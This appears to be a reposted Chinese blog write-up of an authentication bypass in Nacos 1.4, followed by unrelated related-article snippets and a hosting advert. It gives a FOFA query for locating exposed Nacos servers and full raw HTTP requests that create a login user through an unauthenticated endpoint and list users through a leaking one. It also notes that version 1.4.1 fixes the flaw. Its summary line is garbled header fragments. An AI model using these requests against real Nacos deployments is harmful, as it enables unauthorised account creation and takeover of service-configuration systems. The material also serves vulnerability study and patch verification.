Nacos 认证绕过

摘要:
Mozilla/5.0(Macintosh;https://pageNo=1&pageSize=100HTTP/1.1主机:47.108.000.000用户代理:Mozilla/5(Macintosh;rv:zh;zh HK;en-US;q=0.3,en;q=0.2接受编码:closeReferer:https:

Nacos 介绍

Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。

漏洞成因:

1、未授权访问接口,可以创建登录用户 

2、严格意义上来说,还有一个接口,属于敏感信息泄露漏洞

漏洞影响:

1.4版本

漏洞复现:

FOFA语法:title="nacos"

Nacos 认证绕过第1张

通过未授权接口创建用户

POST /v1/auth/users?username=test&password=test123 HTTP/1.1
Host: 47.108.000.000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: https://47.108.000.000
Connection: close
Referer: https://47.108.000.000/

Nacos 认证绕过第2张

通过信息泄漏的接口查询用户是否创建成功

GET /v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 47.108.000.000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: https://47.108.000.000
Connection: close
Referer: https://47.108.000.000/

Nacos 认证绕过第3张

漏洞验证

使用创建的系统登录系统

Nacos 认证绕过第4张

漏洞补丁:

1.4.1 官网已经修复了该漏洞。

免责声明:文章转载自《Nacos 认证绕过》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇4、骨牌铺法涨姿势了解一下Kafka消费位移可好?下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

【Linux】freetds安装配置连接MSSQL

我使用的是freetds-0.91,下载地址:http://pan.baidu.com/s/1hq68rZY 安装编译(根据需要unixodbc): [root@zabbixserver / ]# tar zxvf freetds-stable.tgz [root@zabbixserver / ]# cd freetds-0.91 [root@zabbix...

zabbix 安装(离线源码安装)

1、LAMP 环境搭建   1.1 、安装 apache   安装 pcre tar -zxvf pcre-8.41.tar.gz cd pcre-8.41 ./configure --prefix=/home/pcre make make install 安装 apr tar -zxvf apr-1.6.5.tar.gz cd apr-1.6.5 ....

使用sphinx自动提取python中的注释成为接口文档

写好了代码,交付给他人使用的时候,查看代码固然可以了解各类和函数的功能细节,但接口文档能更方便的查找和说明功能。所以,一价与代码同步的接口文档是很有必要的。sphinx可以根据python中的注释,自动的生成接口文档,这样有利于保证文档和代码功能的同步。让我们来了解如何自动生成文档。 1. python代码格式。 class A: '''...

(转)仅供个人学习-接口测试工具:jmeter、postman、soapUI的区别

1.  用例组织方式 首先是用例组织方式的不同,不同的目录结构与组织方式代表不同工具的测试思想,学习一个测试工具应该首先了解其组织方式。 SoapUI的组织方式如下图,最上层是WorkSpace,每个窗口只可以打开一个WorkSpace(这是一个xml文件),每个Project也是一个单独的xml文件(为了协同工作,也可以通过设置将其转化为一堆文件集合),...

ubuntu安装更新命令

ubuntu16.04LTS 进入ubuntu系统后,打开一个终端,如图所示。此时以普通用户身份登录。   由于更新系统需要用到管理员权限,因此要么使用"su -"直接切换到root用户下,然后再更新。也可以使用sudo暂时获取管理权限进行更新。这里采用第二种方式。 输入sudo apt update,低于16.04版本的ubuntu输入sudo...

Windows XP官方原版系统(所有历史版本下载)

软件简介:    Windows XP,是微软公司(Microsoft)推出的供个人电脑使用的操作系统,包括商用及家用的台式电脑等。其名字“XP”的意思是英文中的“体验(Experience)”,是继Windows 2000及Windows ME,9X之后的下一代Windows操作系统,也是微软首个面向消费者且使用Windows NT5.1架构的操作系统,...